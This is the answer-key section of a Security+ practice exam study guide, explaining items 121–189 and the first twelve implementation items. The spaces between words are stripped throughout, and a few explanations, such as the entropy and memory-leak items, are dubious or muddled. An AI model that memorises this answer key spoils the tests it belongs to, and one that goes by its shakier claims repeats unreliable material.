121. A. Windowscallsthepointthatitsavestoreturntoaknowngoodconfigurationasystemrestorepoint.Mattshouldsetonepriortoinstallingnewsoftwareorpatchingifheisworriedaboutwhatmightoccur.TherestoftheoptionsarenotWindowsterms.

122. A. TOTP,ortime-basedone-timepassword,algorithmsrelyonthetimebeingaccuratebetweenbothoftheauthenticationhosts.Thatmeansthatifasystemordeviceisnotproperlysyncedtoanauthoritativeandcorrecttimeserver,orifitslocalsystemtimehasdrifted,theauthenticationmayfail.AlthoughTOTPsystemshavesomeflexibility,aclockthatissufficientlyincorrectwillcauseanissue.HMAC-basedone-timepassword(HOTP)andshortmessageservice(SMS)-basedmultifactorsystemsdonotsufferfromthisissue,andMMACwasmadeupforthisquestion.

123. C. Objectdetectioncapabilitiescandetectspecifictypesorclassesofobjectsandcanbeusedtodetermineiftheobjectismoved.Inthiscase,Ninacouldenableobjectdetectiontonotifyherwhenpackagesaredelivered,andshemaybeabletospecificallyselectanobjecttomonitorforadditionalsecurity.Infraredcapabilitiesareusefulinlow-lightsituations,motiondetectionhelpstopreservestoragespacebyonlyrecordingwhenmotionoccurs,andfacialrecognitioncouldhelpidentifyspecificindividualsbutwon’thelpwithpackages.

124. C. Althoughuserhealthdataisaconcernforthewearerofthedevice,unlessthedeviceisrequiredbytheorganization,theuser’shealthdataistypicallynotanorganizationalsecurityconcern.GPSlocationdata,dataexposurefromdatathatiscopiedtooraccessiblefromthedevice,andthepotentialfordevicestoactasunsecuredwirelessgatewaystotheorganization’snetworkareallcommonsecurityconcernsforwearables.Lackofpatching,lackofdeviceencryption,andtheinabilitytoenforcecomplianceorsecuritypoliciesarealsocommonconcernsforwearables.

125. D. AFaradaycageisametalwiremeshdesignedtoblockelectromagneticinterference(EMI).NoneoftheotheranswersdescribewhataFaradaycageisusedfororcapableof.

126. B. Smartcardspairedwithelectroniclockscanbeusedtoallowentrance


intoabuilding.Thesmartcardsystemcanalsostoreinformationabouttheuser,andthusthesystemcanlogwhoentersthebuilding.Asecurityguardwithasign-insheetwouldfunction,buttherearemanywaystosubvertasign-insheet,andaguardcanbedistractedorbecomeinattentive.Thismakessmartcardaccessabettersolution.Guardsarealsomoreexpensiveovertime.Acamerawouldrecordwhoentersbutwouldnotcontrolaccess.Anonemployeecouldenterthebuilding.Anuncontrolled/supervisedsign-insheetwouldnotbesecure.

127. D. Althoughelectroniclocksofferanumberofadvantages,includingtheabilitytoprovidedifferentcodesoraccesstodifferentusersandtheabilitytodeprovisionaccess,theyalsorequirepower,whetherintheformofabatteryorconstantlyprovidedpowerfromapowersource.Thatmeansthatpowerlosscancauseissues,eitherduetothelockremaininglockedordefaultingtoanopenstate.

128. A. Managingherorganization’sIPaddressschemaandusagewillallowKaratoidentifyunknownandpotentiallyroguedevices.IPaddressesarenotusedtosecureencryptionkeys,andmanagingaschemawillnothelppreventdenial-of-serviceattacks.KeepingtrackofwhatIPaddressesareinusecanhelpavoidIPaddressexhaustion,butthisdoesnotprovideadirectsecurityadvantage.

129. C. Ofthelockslistedhere,deadboltsarethemostsecure.Thelockingboltgoesintothedoorframe,makingitmoresecure.Whetheralockusesakeyorcombinationdoesnotchangehowsecureitis.Key-in-knobisaverycommon,andgenerallyprovideslessresistancetobypassthanadeadbolt-basedsolution.Finally,padlockscanbecutoffwithcommonboltcutters.

130. B. NICteamingcanprovidegreaterthroughputbysendingtrafficthroughmultiplenetworkinterfacecards(NICs)whilealsoensuringthatlossofacardwillnotcauseanoutage,thusprovidingfaulttolerance.

131. A. Falseacceptancerate(FAR)istherateatwhichthesystemincorrectlyallowsinsomeoneitshouldnot.Thisisclearlyasignificantconcern.Anyerrorisaconcern,butthefalserejectionrateislesstroublesomethanthefalseacceptancerate.Thecross-overerrorrate(CER)iswhentheFARandthefalserejectionrate(FRR)becomeequal.Thisindicatesaconsistentoperationofthebiometricsystem.Theequalerrorrateisanothernameforcross-overerrorrate.

132. C. Datasovereigntyreferstotheconceptthatdatathatiscollectedand


storedinacountryissubjecttothatcountry’slaws.Thiscanbeacomplexissuewithmultinationalcloudservicesandprovidersthatmaystoredatainmultiplecountriesaspartoftheirnormalarchitecture.Itmayalsocreatecomplianceandotherchallengesbasedondifferencesinnationallawsregardingdata,dataprivacy,andsimilarissues.

133. A. Low-powerdevicestypicallyhavelimitedprocessorspeed,memory,andstorage,meaningthatencryptioncanbeachallenge.Fortunately,solutionsexistthatimplementlow-powercryptographicprocessingcapabilities,andcontinuedadvancesinprocessordesigncontinuetomakelower-powerprocessorsfasterandmoreefficient.Legallimitationsdonottypicallytakeintoaccountwhetheradeviceisalow-powerdevice,andpublickeyencryptioncanbeimplementedonawiderangeofCPUsandembeddedsystems,sofactoringprimenumbersisunlikelytobeanissue.

134. A. Asecurecabinetorsafeistamper-proofandprovidesagoodplacetostoreanythingyouaretryingtophysicallyprotect.Encryptingthumbdriveswouldrequireyoutostorethekeyusedtoencryptthethumbdrive,thuscontinuingtheproblem.ItisactuallyagoodpracticetostoreBitLockerkeysonremovablemedia,providedthatmediaissafeguarded.Inmostcases,deskdrawersarenotsecureandcaneasilybebrokeninto,eveniftheyarelocked.

135. D. RAID6,diskstripingwithdualparity,usesaminimumoffourdiskswithdistributedparitybits.RAID6canhandleuptotwodisksfailing.RAID3isbyte-levelstripingwithdedicatedparityandcannottoleratemorethanasingledrivefailing.RAID0isdiskstriping,whichcannothandlediskfailure,andRAID5,diskstripingwithdistributedparity,canhandleonlyonediskfailing.

136. C. Theabilitytorecordisnotincludedinmanytraditionalclosed-circuittelevision(CCTV)monitoringsystemsandisakeyelementofinvestigationsoftheftandotherissues.Motionactivationandfacialrecognitionaretypicallyassociatedwithcomputer-basedcamerasystemsbutdonotdirectlyaddresstheconcernMariaisworkingtohandle.Infraredcameraswouldbemoreusefulinspaceswherelightswerenotalwaysinuse,suchasoutdoorsorinfacilitiesthatarenotoccupiedatnight.

137. C. Staticcodesaretypicallyrecordedinasecurelocation,butiftheyarenotproperlysecured,orareotherwiseexposed,theycanbestolen.Brute-forceattemptsshouldbedetectedandpreventedbyback-offalgorithmsand


othertechniquesthatpreventattacksagainstmultifactorauthenticationsystems.Collisionsexistwithhashingalgorithms,notwithstaticmultifactorcodes,andclockmismatchissuesoccurfortime-basedone-timepassword(TOTP)codes.

138. B. Asymmetriccryptosystemwilltypicallyperformfasterandwithlessprocessoroverheadandthuslowerlatencythanasymmetriccryptosystems.Hashingisnotencryption,andone-timepadsarenotimplementedinmoderncryptosystems,althoughtheymayhaveusesinfuturequantumcryptographicsolutions.

139. A. Industrialcamouflageeffortsminimizehownoticeableafacilityis,helpingittoremainunnoticedbycasualobservers.Althoughindustrialcamouflagecanbeuseful,itisrarelyeffectiveagainstdeterminedadversaries.Ademilitarizedzone(DMZ)ininformationsecuritytermsisanetworksegmentthatisintentionallyexposedtothepublicwithappropriatesecurityprotecting,whilestrongersecurityisappliedtononpublicresources.Disruptivecolorationisacamouflagetechniquebutnotoneusedininformationsecurity.Industrialobfuscationwasmadeupforthisquestion.

140. A. Asymmetriccryptographyhasarelativelyhighcomputationaloverhead,makingsymmetrickeyencryptionfaster.Thatmeansthatonceyoucanexchangeanephemeralsymmetrickey,oraseriesofkeys,youcanencryptandsenddatamorequicklyandefficientlyusingsymmetricencryption.Thereisnokeylengthlimitation,andreasonablelifespansaremetwitheithertechnology.Keyreuseisnotanissuewithapublickeyencryptionscheme.

141. D. Failuretoreleasememoryyouhaveallocatedcanleadtoamemoryleak.Therefore,ifyouareusingaprogramminglanguagelikeC++thatallowsyoutoallocatememory,makecertainyoudeallocatethatmemoryassoonasyouarefinishedusingit.Allocatingonlythevariablesizeneededanddeclaringvariableswhereneededaregoodprogrammingpractices.However,failuretofollowthemjustleadstowastefuluseofmemory;itdoesnotleadtoasecurityproblemlikeamemoryleak.Althoughthisisagoodideatopreventbufferoverflows,itisnotamemorymanagementissue.

142. B. Usingalongerkeyisthebestwaytomakeitlesslikelythatanencryptedfilewillbecracked.Thisdoesnotpreventissueswiththe


algorithmitself,butifavulnerabilityisnotfoundinanalgorithm,addingkeylengthwillhelpensurethatevensignificantincreasesincomputationalpowerwillnotresultintheencryptionbeingcrackedinareasonableperiodoftime.Quantumcomputinghasthepotentialtochangethis,butpracticalquantumencryptioncrackingtoolsarenotknowntobeavailableyet.Thereisnosuchthingasananti-quantumcipher,andarotatingsymmetrickeymightbeusedtoensurethatakeycouldnotbecrackedbutdoesnotprovidelongevity.Instead,itisusedtoallowephemeralcommunicationstobelesslikelytobecrackedonanongoingbasis.

143. C. ThebestanswerfromthislistisDLP,ordatalosspreventiontechnology.DLPisdesignedtoprotectdatafrombeingexposedorleakingfromanetworkusingavarietyoftechniquesandtechnology.Statefulfirewallsareusedtocontrolwhichtrafficissenttoorfromasystem,butwillnotdetectsensitivedata.OEMisanoriginalequipmentmanufacturer,andsecurityinformationandeventmanagement(SIEM)canhelptrackeventsandincidentsbutwillnotdirectlyprotectdataitself.

144. C. Encryptionkeysusedforquantumkeydistributionaresentintheformofqubits.Thepolarizationstateofthequbitsreflectsthebitvaluesofthekey.Oncesent,thereceivercanvalidatethestateofsomeofthosequbitstoensurebothsenderandreceiverhavethesamekey.Bytesandbitsareusedintraditionaldataexchanges,andnuquantsweremadeupforthisquestion.

145. B. Two-personcontrolschemesrequiretwoindividualstobeinvolvedtoperformanaction.ThismeansthatAliciacanimplementatwo-personcontrolschemeknowingthatbothindividualswouldhavetobeinvolvedtosubvertthecontrolprocess.Biometricswillmerelyvalidatethatapersoniswhotheysaytheyare,roboticsentriesdonotaddanyparticularvaluetothisscenario,andademilitarizedzone(DMZ)isusedtokeepfront-facingsystemsinazonethatcanbecontrolledandsecured.

146. A. Socialloginisanexampleofafederatedapproachtousingidentities.Thecombinationofidentityprovidersandserviceproviders,alongwithauthorizationmanagement,isakeypartoffederation.AAAisauthentication,authorization,andaccountingandistypicallyassociatedwithprotocolslikeRADIUS.Privilegecreepoccursasstaffmemberschangejobsandtheirprivilegesarenotadjustedtoonlymatchtheircurrentrole.IAMisabroadersetofidentityandaccessmanagementpractices.AlthoughIAMmaybeinvolvedinfederatedidentity,thisquestiondoesnotdirectlydescribeIAM.


147. A. USBdatablockersareusedtoensurethatcablescanonlybeusedforcharging,andnotfordatatransfer.Noneoftheotheranswerstothisquestionareusedforthispurpose,andinfactallweremadeup—USBisaserialbus,circuitbreakersareusedforpower,andHMAC-basedone-timepassword(HOTP)isatypeofmultifactortokenalgorithm.

148. B. Intheplatform-as-a-service(PaaS)model,theconsumerhasaccesstotheinfrastructuretocreateapplicationsandhostthem.Software-as-a-service(SaaS)suppliesaparticularapplication;infrastructure-as-a-service(IaaS)doesnotdirectlyprovidetheabilitytocreateapplications,althoughthisdistinctionisquicklyblurring;andIDaaSisidentity-as-a-service.

149. B. Avoidingreuseofthekeycomponentsofanencryptionprocessmeansthatevenifamaliciousactormanagedtobreaktheencryptionforamessageorexchange,thenextnewinitializationvector(IV)andkeywouldrequireanentirelynewbrute-forceattack.UsinganewIVandkeydoesnotmakebrute-forceattacksimpossible,nordoesitmakebruteforceeasier.Asinglesuccessfulattackwouldexposeasinglemessage,orhowevermuchdatawasencryptedusingthatIVandkey.

150. C. TheLinuxkernelusesuser-driveneventslikekeystrokes,mousemovement,andsimilareventstogeneraterandomness(entropy).Thetimeofdayisnotrandom,userloginsaretypicallynotfrequentenoughorrandomenoughtobeausefulsourceofentropy,andnetworkpackettimingisnotusedforthis.Ifyouencounteraquestionlikethisanddon’tknowwheretostart,considerwhatyouknowaboutentropy—itisrandomness,soyouwouldbelookingfortheinputthatwouldhavethemostrandomnesstoit.Thus,youcouldruleoutthetimeofday,andlikelyuserlogins.Afterthat,youmightconsiderwhatcouldbecontrolledbyanexternalparty:networkpacketsbeingsenttothesystem,andrulethatoutasapotentialattackvector.Thatleaveskeyboardinputandmousemovement.

151. C. EllipticcurveencryptionschemesallowtheuseofashorterkeyforthesamestrengththatanRSAkeywouldrequire,reducingthecomputationaloverheadrequiredtoencryptanddecryptdata.Thatdoesn’tmeanyoushoulduseashortkey;instead,youmustselectakeylengththatmatchesyourrequirementsforresistancetobruteforceandotherattacks.Hashingisnonreversibleandisnotaformofencryption.

152. C. Lightingservesadeterrentcontrol,makingpotentialmaliciousactorsfeelliketheymaybeobservedwithoutdarkareasorshadowstohidein.It


doesnotdetectactions,itdoesnotcompensateforthelackofanothercontrol,andalthoughsomelightsmayturnonformotion,theprimarypurposeistodetermaliciousorunwantedactions.

153. C. Edgecomputingplacesbothdatastorageandcomputationalpowerclosertowhereitisneededtosaveonbandwidthandtoimprovetheresponseofassociatedapplicationsandservices.Hybridcomputingcombineslocalandcloudcomputing.Localcloudbuildscloudinfrastructureonlocalsystems.Mistcomputingwasmadeupforthisquestionbutmaysoundsimilartofogcomputing,atermthathasasimilarmeaningtoedgecomputing,whichuseslocalcomputationandstoragethatisthenInternetconnected.

154. D. Benhasdeployedatokenizationscheme.Encryptionwouldrequirethedatatobedecryptedtobeused,andthisisnotmentioned.Hashingcouldbeusedtoconcealvaluesbutdoesnotpreservetheabilitytoworkwiththedata.Maskingmodifiescontenttoconcealpersonallyidentifiableinformationorothersensitiveinformation.

155. D. FencingisbothausefuldeterrentbecauseitdiscouragesmaliciousactorsfromaccessingthegroundsthatDanawantstoprotect.Itisalsoanexampleofaphysicalcontrol.Avisitorlogisanadministrativecontrolandwillnotdetermaliciousactors.Motiondetectorsandcamerasareexamplesofdetectivecontrols.

156. A. Addingadigitalsignaturecanensurethatboththemessagehasnotbeenchanged,andthusitsintegrityisintact,andthatitsupportsnonrepudiationbyprovingthatthemessageisfromthesenderwhoclaimstohavesentit.

157. B. Attestationprocessesrequestresponsiblemanagersorotherstovalidatethatuserentitlementsorprivilegesarecorrectandmatchthosethattheusershouldhave.Attestationisnotanemploymentverificationprocess,althoughmanagersmaydiscoverthatuserswhohavelefttheorganizationstillhaverightsaspartofanattestationprocess.Itdoesnotrequireproofofidentityorvalidationofsecuritycontrols.

158. B. Ageneratoristhemostappropriateanswertoamultihouroutage.Althoughahotsitewouldallowherorganizationtostayonline,thecostofahotsiteismuchhigherthanthatofagenerator.APDU,orpowerdistributionunit,isusedtomanageanddistributepower,nottohandlepoweroutages.Finally,UPSsystemsarenottypicallydesignedtohandle


longoutages.Instead,theyconditionpowerandensurethatsystemsremainonlinelongenoughforageneratortotakeoverprovidingpower.

159. A. AMACsupportsauthenticationandintegrityandisusedtoconfirmthatmessagescamefromthesenderwhoisclaimedtohavesentitandalsoensurethatrecipientscanvalidatetheintegrityofthemessage.Itdoesnothelpwithconfidentiality.

160. C. Inertgassystemsareusedtoreducetheoxygeninaroomwithoutthehazardtostaffthatcarbondioxidesystemsuse.Bothdry-pipeandpre-chargesystemsusewater,whichcanharmdelicateelectronics.

161. C. ProximitycardreadersusuallyworkusingRFID(radiofrequencyID)technology.Thisallowscardstobeusedinproximitybutwithoutrequiringadirectreaderlikeamagneticstripe.Neitherbiometricsorinfraredareusedforproximitycardreaders.

162. A. Digitalsignaturesthatuseasender’sprivatekeyprovidenonrepudiationbyallowingasendertoprovethattheysentamessage.Unlessthesender’sprivatekeyhasbeencompromised,signingamessagewiththeirprivatekeyandallowingtherecipienttovalidatethesignatureusingtheirpublickeyensuresthatthesendersentthemessageinquestion.Longerkeysdon’tprovewhoasenderis,hashesarenotreversible,andthepublickeyinuseisthesender’s,nottherecipient’s.

163. B. Naturaldisasters,aswellasman-madedisasters,areprimaryconsiderationsforgeographicsecurityconsiderations.Placingbackupsitesoutsideofthelikelypathorrangeofasingledisasterhelpsensurecontinuityofoperationsfororganizations.MTRisthemaximumtimetorestore,sprawlavoidanceisusuallyconsideredforvirtualmachines,andserviceintegrationisaconsiderationforservicearchitectures,notgeographicalplacement.

164. B. Althoughactualthreatsfromdronesandunmannedaerialvehicles(UAVs)arerelativelyrareformostorganizations,placingsensitiveareasfurtherinsideabuildingwilldetermostcurrentgenerationsofdronesfromenteringorrecordingthem.SecuritydoorsandothercommonobstacleswillpreventmostUAVordronepenetrationthattypicalorganizationswillface.Fencesareeasilybypassedbyflyingdrones,biometricsensorswon’tstopadronefromhoveringoutsideofawindow,andFaradaycagesmightstopadronefromreceivingcommandsifyoucouldgetthedroneinsidefirst!

165. D. Thekeytrade-offwhenconsideringresourceconstraintsforencryption


isthatstrongerencryptionwithlongerkeysrequiresmorecomputationaltimeandresources.Thismeansthatitwillbeslowerandwillconsumemoreofthecapacityofasystem.Abalancebetweensecurityandcomputationaloverheadneedstobestruckthatmatchestheconfidentialityneedsofthedatathatisbeinghandledorsent.Strongerencryptionisusuallyslower,runningoutofentropyinthescenariodescribedisnotatypicalconcern,andstrongerencryptiontakingupsignificantamountsofdrivespaceisalsonotarealissueinthisscenario.

166. C. Encryptingthemessagewillensurethatitremainsconfidentialaslongasonlytherecipientisabletodecryptit.Hashingthemessagewillresultinthemessagenotbeingrecoverable,whereasdigitallysigningitcanprovidenonrepudiation.Finally,quantumencryptionalgorithmsandthesystemsrequiredtousethemarenotavailabletoday,meaningAmandawon’tbeabletousethem—yet!

167. C. Inmostcases,themajorcloudserviceprovidershavemoresecuritystaffandagreaterbudgetforsecurityoperations.Thismeanstheycaninvestmoreinsecuritycontrols,staffing,monitoring,andotheractivities.Usingacloudserviceprovidercanhelpimprovetheoverallsecuritypostureofanorganizationthatmightnothavetheabilitytohavefull-timeordedicatedsecuritystafforexpertise.Atthesametime,localstaffwillunderstandthebusinessbetterandwillusuallyhaveafasterresponsetimetocriticalbusinessneeds.

168. D. Networkloadbalancersdistributetrafficamongsystems,allowingsystemstobeaddedorremoved,andmakingpatchingandupgradeseasierbydrainingconnectionsfromsystemsandremovingthemfromthepoolwhenworkneedstobedoneonthem.Theycanalsohelpmonitorsystemsforperformance,reportonissues,andensurethatloadsmatchthecapabilitiesofthesystemsthattheyareinfrontof.Firewallsareusedforsecurity,switchesareanetworkdeviceusedtotransfertraffictothecorrectsystem,andahorizontalscalerwasmadeupforthisquestion.

169. D. Protectedcabledistributionusessuchcontrolsaselectrical,electromagnetic,andevenacousticorairpressuresensorstoensurethatcablesanddistributioninfrastructurearenotaccessed,allowingsensitiveinformationtobetransmittedinunencryptedform.TheU.S.governmentidentifiesthreeoptions:hardenedcarrier,alarmedcarrier,andcontinuouslyviewedprotecteddistributionsystems.ShieldedcablesareusedtopreventEMI.


170. B. Maureenisusingtheconceptofaudiosteganographybyhidingdatainsideanaudiofileinawaythatconcealsitfromdetection.Theotheroptionsaremadeupforthisquestion.

171. B. SinceNicoleisspecificallyworriedaboutSMSpushestocellphones,themostlikelyattackmodelisSIM(subscriberidentitymodule)cloning,allowingattackerstoobtaintheauthenticationcodessenttolegitimateusers.AttacksonaVoiceoverInternetProtocol(VoIP)systemwouldtypicallyhelpinterceptSMSifitwassenttoVoIPphones,notcellphones(althoughforwardingispossible,butnotmentionedhere).Brute-forceattacksareunlikelytosucceedagainstSMSphonefactors,andrainbowtablesareusedtocrackhashedpasswords.

172. C. Encryptionisoftenusedtoprotectdataatrest.Whendataneedstobeaccessed,itcanbedecrypted.Hashingisnotreversible,meaningthatitisnotusedfordatastoragewhentheoriginalformisneededforprocessing.Comparinghashedpasswordsworksbecausethepasswordispresentedagain,ratherthanthepasswordneedingtoberetrievedfromstorage.TLSisusedtoprotectdatainmotion,andtokenizationisadatasecuritytechniquethatreplacessensitivedataelementswithnonsensitiveelementsthatcanstillbeprocessedinusefulways.

173. B. Nathanielhascreatedanairgap,aphysicalseparationthatwillrequiremanualtransportoffiles,patches,andotherdatabetweenthetwoenvironments.Thishelpstoensurethatattackerscannotaccesscriticalsystemsandthatinsiderscannotexportdatafromtheenvironmenteasily.Ademilitarizedzone(DMZ)isaseparatenetworksegmentorzonethatisexposedtotheoutsideworldorotherlowertrustarea.Avaultisasecuredspaceorroom,butvaultingisnotatermusedontheSecurity+exam,andahotaisleistheaislewhereserversexhaustwarmair.

174. A. Maskingmodifiescontenttoconcealpersonallyidentifiableinformation(PII)orothersensitiveinformation.Tokenizationreplacessensitiveinformationwithanonsensitivealternativethatallowsthedatatostillbeprocessedinusefulways.Encryptionwouldrequirethedatatobedecryptedtobeused,andthisisnotmentioned.Hashingcouldbeusedtoconcealvaluesbutdoesnotpreservetheabilitytoworkwiththedata.

175. C. On-premisescloudcomputingisoftencalledprivatecloud.Notallprivatecloudshavetobeon-site,becauseprivatecloudscouldbedeployedtoaremotelocationlikeathird-partyhostingfacility.Infrastructureasa


serviceandplatformasaservicerefertothird-partyhostingservices,andhybridcloudcombinesbothon-premisesandcloudcomputingmodels.

176. C. Themostlikelythreattophysicaltokensistheftorlossresultinginaccesstothetoken.Cloningtokensmightbepossibleifthetoken’sseedwereknown,buttheyaredesignedtopreventthisfrombeingreverse-engineered,meaningasignificantbreachofthevendororsimilarissuewouldberequiredtocauseanexposure.Bruteforceisnotarealisticthreatagainstmosttokenimplementations,norisalgorithmfailure.

177. D. Controldiversitymeansutilizingdifferentcontrolstomitigatethesamethreat.Formalware,theuseoftechnicalcontrols,suchasantimalware,iscritical.Butitisalsoimportanttohaveadministrativecontrols,suchasgoodpolicies,andtoensurethatemployeesareproperlytrained.Thus,forthisquestionacombinationofpolicies,training,andtoolsisthebestanswer.

178. A. AlthoughitmayseemlikeCharleshaspresentedtwofactors,infacthehasonlypresentedtwotypesofthingsheknowsalongwithhisidentity.Totrulyimplementamultifactorenvironment,heshouldusemorethanoneofsomethingyouhave,somethingyouknow,andsomethingyouare.

179. C. Saltreuseisacriticalmistake,becauseitwouldallowarainbowtabletobegeneratedusingthatsalt.Althoughstandardrainbowtableswouldnotwork,areusedsaltwouldonlyrequirethecreationofasinglenewrainbowtable.Alphanumericsaltsarenotaproblem,longsaltsarenotaproblem,andthissaltisareasonablelengthat16charactersusinghexadecimal.

180. B. Alaina’sneedforalocal,securestorageareaisanidealsituationfortheuseofavaultorsafewherethekeyscanbestoredonadevicelikeathumbdrive.Simplyplacingthemonadriveleavesthemvulnerabletotheft,andanair-gappedsystemwouldalsobepotentiallyexposedtotheftorlocalbreaches.

181. B. ItiscriticaltoauthenticateAPIusersandthentoauthorizethemtotakeactions.Ifyouauthorizedfirstandthenauthenticated,userscouldtakeactionbeforeyouknewwhotheywere!EncryptingthroughouttheuseoftheAPIkeepsdataandqueriessecure,validatinginputandfilteringoutdangerousstringsisimportanttopreventinjectionandotherattacks,andauditingandloggingallowsyoutotroubleshootandrespondtoissuesandattacks.

182. C. Frankhasusedadegaussertoerasethedataonthetapes.Degaussing


onlyworksonmagneticmedialiketapesandwillnotworkonopticalorflashmedia.Burningmediaormaterialsisexactlywhatitsoundslike—puttingthemintoafire!Shreddingandpulpingaremechanicalmeansofdestruction.

183. A. 5Grequireshigherantennadensityforfullbandwidthcommunicationthanprevioustechnologies,meaningthatAngela’sorganizationwillhavetocarefullyconsiderantennaplacement,particularlyinsidebuildingswherestructuralelementscancreatechallengeswithsignalpropagation.5Gisusableindoors,iscommerciallyavailable,andcancoexistwithtraditionalWi-Fi,soAngelashouldnotincludethoseinherlistofconcerns.

184. A. Chrisisconcernedaboutprivilegecreep,theslowaccumulationofprivilegesovertimeasstaffmemberschangerolesandtheirprivilegesarenotremovedorupdated.Privilegemanagementprocesseswouldhelptopreventthis,thuskeepingdatamoresecure.Oftheotheroptions,onlyprivilegeescalationisacommonterm,anditmeansgainingadditionalprivileges,typicallyaspartofanattackfromanaccountwithfewerprivilegestoamoreprivilegedaccountlikeanadministratororrootaccount.

185. C. Honeyfilesarefilesthatareintendedtohelpdetectattackers.Theyareplacedinalocationwhereaccessingthemcanbedetectedbutarenotsetuptoallowuserstoaccessthem.Thatmeansthatattackerswhoaccesstheseeminglydesirablefilecanbeeasilydetectedandappropriatealertscanbesent.

186. C. Althoughthereisnospecificrecommendeddistance,recommendationstypicallyrangefrom60to120milesawaytoensurethatasingledisasterisunlikelytodisablebothlocations.

187. B. FogcomputingisatermcoinedbyCiscotodescribecloudcomputingattheedgeofanenterprisenetwork.Themorecommontermforthisisedgecomputing,butyoumayencounterbothterms.Fogimplementationshandlesignificantamountsofcomputation,communication,andstorageactivitieslocally,whilealsoconnectingtocloudservicestoperformsomeofthework.

188. A. Bcrypt,scrypt,andPBKDF2areallexamplesofkeystretchingalgorithms.MD5andSHA1arebothhashingalgorithms,andncryptwasmadeupforthisquestion.

189. C. TheonlydirectoryservicelistedisLightweightDirectoryAccess


Protocol(LDAP).SAMLisSecurityAssertionMarkupLanguage,OAuthisanauthorizationdelegationprotocol,and802.1xisanetworkauthenticationprotocol.


Chapter3:Implementation1. A. Dualcontrol,whichrequirestwoindividualstoperformafunction;

splitknowledge,whichsplitsthepassphraseorkeybetweentwoormorepeople;andseparationofduties,whichensuresthatasingleindividualdoesnotcontroloroverseetheentireprocessallhelppreventinsiderthreatswhenmanagingaPKI.Requiringanewpassphrasewhenacertificateisusedisnotareasonablesolutionandwouldrequirereissuingthecertificate.

2. B. AsitesurveyistheprocessofidentifyingwhereaccesspointsshouldbelocatedforbestcoverageandidentifyingexistingsourcesofRFinterference,includingpreexistingwirelessnetworksandotherdevicesthatmayusethesameradiofrequencyspectrum.Byconductingasitesurvey,Naomicanguidetheplacementofheraccesspointsaswellascreateachanneldesignthatwillworkbestforherorganization.

3. B. TheoptionthatbestmeetstheneedsdescribedaboveisPEAP,theProtectedExtensibleAuthenticationProtocol.PEAPreliesonserver-sidecertificatesandreliesontunnelingtoensurecommunicationssecurity.EAP-MD5isnotrecommendedforwirelessnetworksanddoesnotsupportmutualauthenticationofthewirelessclientandnetwork.LEAP,theLightweightExtensibleAuthenticationProtocol,usesWEPkeysforitsencryptionandisnotrecommendedduetosecurityissues.Finally,EAP-TLS,orEAPTransportLayerSecurity,requirescertificatesonboththeclientandserver,consumingmoremanagementoverhead.

4. C. East-westtrafficistrafficsentlaterallyinsideanetwork.Somenetworksfocussecuritytoolsattheedgesorplaceswherenetworksinterconnect,leavinginternal,oreast-west,trafficopen.Inzero-trustenvironments,internaltrafficisnotpresumedtobetrustworthy,reducingtherisksofthistypeoflateralcommunication.Side-stepping,slidertraffic,andpeerinterconnectwereallmadeupforthisquestion,althoughpeerinterconnectmaysoundsimilartopeer-to-peertraffic,whichmaybelateralinmanynetworks.

5. C. AlthoughpreventingMultipurposeInternetMailExtensions(MIME)sniffingmaysoundhumorous,MIMEsniffingcanbeusedincross-sitescriptingattacks,andtheX-Content-Type-OptionsheaderhelpspreventMIMEsniffing.HTTPsecurity-orientedheaderscanalsosetX-Frameoptions,turnoncross-sitescriptingprotection,setcontentsecuritypolicies,


andrequiretransportsecurity.Thereisn’ta“DisableSQLinjection”header,however!

6. C. Mobiledevicemanagement(MDM)suitesoftenprovidetheabilitytomanagecontentondevicesaswellasapplications.UsingcontentmanagementtoolscanallowCharlenetoprovisionfiles,documents,andmediatothedevicesthatstaffmembersinherorganizationareissued.Applicationmanagementwouldbeusefulforapps.Remotewipecanremovedataandapplicationsfromthedeviceifitislostorstolen,oranemployeeleavestheorganization.Pushnotificationsareusefulwheninformationneedstobeprovidedtothedeviceuser.

7. C. Inthisscenario,Dennyspecificallyneedstoensurethathestopsthemostmalware.Insituationslikethis,vendordiversityisthebestwaytodetectmoremalware,andinstallingadifferentvendor’santivirus(AV)packageonserverslikeemailserversandtheninstallingamanagedpackageforPCswillresultinthemostdetectionsinalmostallcases.InstallingmorethanoneAVpackageonthesamesystemisrarelyrecommended,sincethisoftencausesperformanceissuesandconflictsbetweenthepackages—infact,attimesAVpackageshavebeenknowntodetectotherAVpackagesbecauseofthedeephookstheyplaceintotheoperatingsystemtodetectmaliciousactivity!

8. B. Amandahasencounteredacaptiveportal.Captiveportalsredirectalltraffictotheportalpage,eithertoallowtheportaltocollectinformationortodisplaythepageitself.Onceusershavecompletedtherequirementsthattheportalputsinplace,theyarepermittedtobrowsetheInternet.ThismaybeaccomplishedbyassigninganewIPaddressorbyallowingtheconnectedIPaddresstohaveaccesstotheInternetusingafirewallruleorothersimilarmethod.Presharedkeysareusedinwirelessnetworksforauthentication.Portsecurityisusedforwirednetworks,andWPAstandsforWi-FiProtectedAccess,asinWPA,WPA-2,andWPA-3.

9. B. DomainNameSystemSecurityExtensions,orDNSSEC,providestheabilitytovalidateDNSdataanddenialofexistence,andprovidesdataintegrityforDNS.Itdoesnotprovideconfidentialityoravailabilitycontrols.IfCharlesneedstoprovidethose,hewillhavetoimplementadditionalcontrols.

10. B. Googleisactingasanidentityprovider,orIdP.AnIdPcreatesandmanagesidentitiesforfederations.AnRPisarelyingparty,whichrelieson


anidentityprovider.AnSPisaserviceprovider,andanRAisaregistrationauthorityinvolvedintheprocessforprovidingcryptographiccertificates.

11. C. SSH,orSecureShell,isasecureprotocolusedtoconnecttocommand-lineshells.SSHcanalsobeusedtotunnelotherprotocols,makingitausefulandfrequentlyusedtoolforsystemadministrators,securityprofessionals,andattackers.UsingHTTPSorTransportLayerSecurity(TLS)forasecurecommandlineisrare,andTelnetisaninsecureprotocol.

12. B. Oftheoptionsprovided,onlyFIDOU2F,anopenstandardprovidedbytheFastIDentityOnlineAlliance,isastandardforsecuritykeys.OtherstandardsthatyoumayencounterincludeOTP(OneTimePassword),SmartCard,OATH-HOTP,andOpenPGP.Ofnote,OATH,theInitiativeforOpenAuthentiationprovidesstandardsbothHMAC-basedonetimepassword(HOTP)andTOTP,ortime-basedonetimepasswords.SAML(SecurityAssertionMarkupLanguage)andOpenIDarebothusedinauthenticationprocessesbutnotforsecuritykeys.ARFwasmadeupforthisquestion.

